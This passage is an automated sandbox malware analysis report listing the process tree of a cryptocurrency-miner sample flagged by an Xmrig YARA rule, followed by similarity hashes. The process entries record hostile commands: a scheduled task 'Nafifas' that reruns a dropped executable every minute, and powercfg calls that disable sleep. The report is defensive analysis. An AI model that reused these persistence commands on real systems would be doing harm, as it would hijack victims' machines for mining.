                                      • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.4800541815.0000000001420000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Has exited:false

                                      Target ID:18
                                      Start time:17:48:13
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff704000000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:17:48:13
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x390000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 55%, ReversingLabs
                                      Has exited:true

                                      Target ID:20
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff750f20000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:21
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:22
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:23
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:24
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff75d770000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:25
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:26
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:27
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:28
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:29
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:30
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff6de290000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:31
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:32
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:33
                                      Start time:17:48:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff7ef060000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:34
                                      Start time:17:48:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:35
                                      Start time:17:48:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:40
                                      Start time:17:49:01
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0xa70000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:41
                                      Start time:17:49:08
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff6f13a0000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:42
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:43
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff7207d0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:44
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:45
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:46
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:47
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:48
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:49
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff72d450000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:50
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff653050000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:51
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:52
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:53
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff72d450000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:54
                                      Start time:17:49:09
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:55
                                      Start time:17:49:10
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:56
                                      Start time:17:49:10
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff7db610000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:57
                                      Start time:17:50:00
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x3f0000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:61
                                      Start time:17:51:14
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff65e490000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:62
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:63
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:64
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:65
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:66
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:67
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:68
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c copy "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:69
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:70
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:71
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:72
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\powercfg.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                      Imagebase:0x7ff7ddfa0000
                                      File size:96'256 bytes
                                      MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:73
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:74
                                      Start time:17:51:15
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:75
                                      Start time:17:51:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff704000000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:76
                                      Start time:17:51:16
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\schtasks.exe
                                      Wow64 process (32bit):false
                                      Commandline:schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
                                      Imagebase:0x7ff790030000
                                      File size:235'008 bytes
                                      MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:77
                                      Start time:17:51:29
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\svchost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                      Imagebase:0x7ff7d3e90000
                                      File size:55'320 bytes
                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:false

                                      Target ID:78
                                      Start time:17:52:00
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
                                      Imagebase:0x990000
                                      File size:5'227'008 bytes
                                      MD5 hash:B03C2D7DF7EABC44F36397CB66AC3E77
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:79
                                      Start time:17:52:02
                                      Start date:18/03/2024
                                      Path:C:\Users\user\AppData\Local\Temp\ghghghg.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Local\Temp\ghghghg.exe"
                                      Imagebase:0x7ff646940000
                                      File size:5'191'680 bytes
                                      MD5 hash:D3CD8232D7097DC4953B61B86AFD7FD2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:80
                                      Start time:17:52:02
                                      Start date:18/03/2024
                                      Path:C:\Windows\System32\cmd.exe
                                      Wow64 process (32bit):false
                                      Commandline:cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
                                      Imagebase:0x7ff6491e0000
                                      File size:289'792 bytes
                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 435d279a336d0467656da0fc4b7288c1d42926fa517a5da9cce9042f3202379f
                                        • Instruction ID: 84bfc85423e4f1600ab72275c9c24e88d004f19998151b22c9aeb98b3cc4a728
                                        • Opcode Fuzzy Hash: 435d279a336d0467656da0fc4b7288c1d42926fa517a5da9cce9042f3202379f
                                        • Instruction Fuzzy Hash: 9601927171D9088FDB98DA1C94666F977D1EF88321B0002FFE09EC7A72DE25A8198741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 322c06d92c39a7c9947ad64acd7323f9cdc93d83e2f44db4c5293f770dc79cb5
                                        • Instruction ID: 6b86a88967fbd354e10bfab9742cd1fb2ad3f722636bf8baa98bcaeeedcc411b
                                        • Opcode Fuzzy Hash: 322c06d92c39a7c9947ad64acd7323f9cdc93d83e2f44db4c5293f770dc79cb5
                                        • Instruction Fuzzy Hash: FD01A4312488188FDF85FF28D09CE6573E2FB783017554459D04ACB665DE32EC86CB81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2358511258.00007FFE167F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE167F0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ffe167f0000_ft1i6jvAdD.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
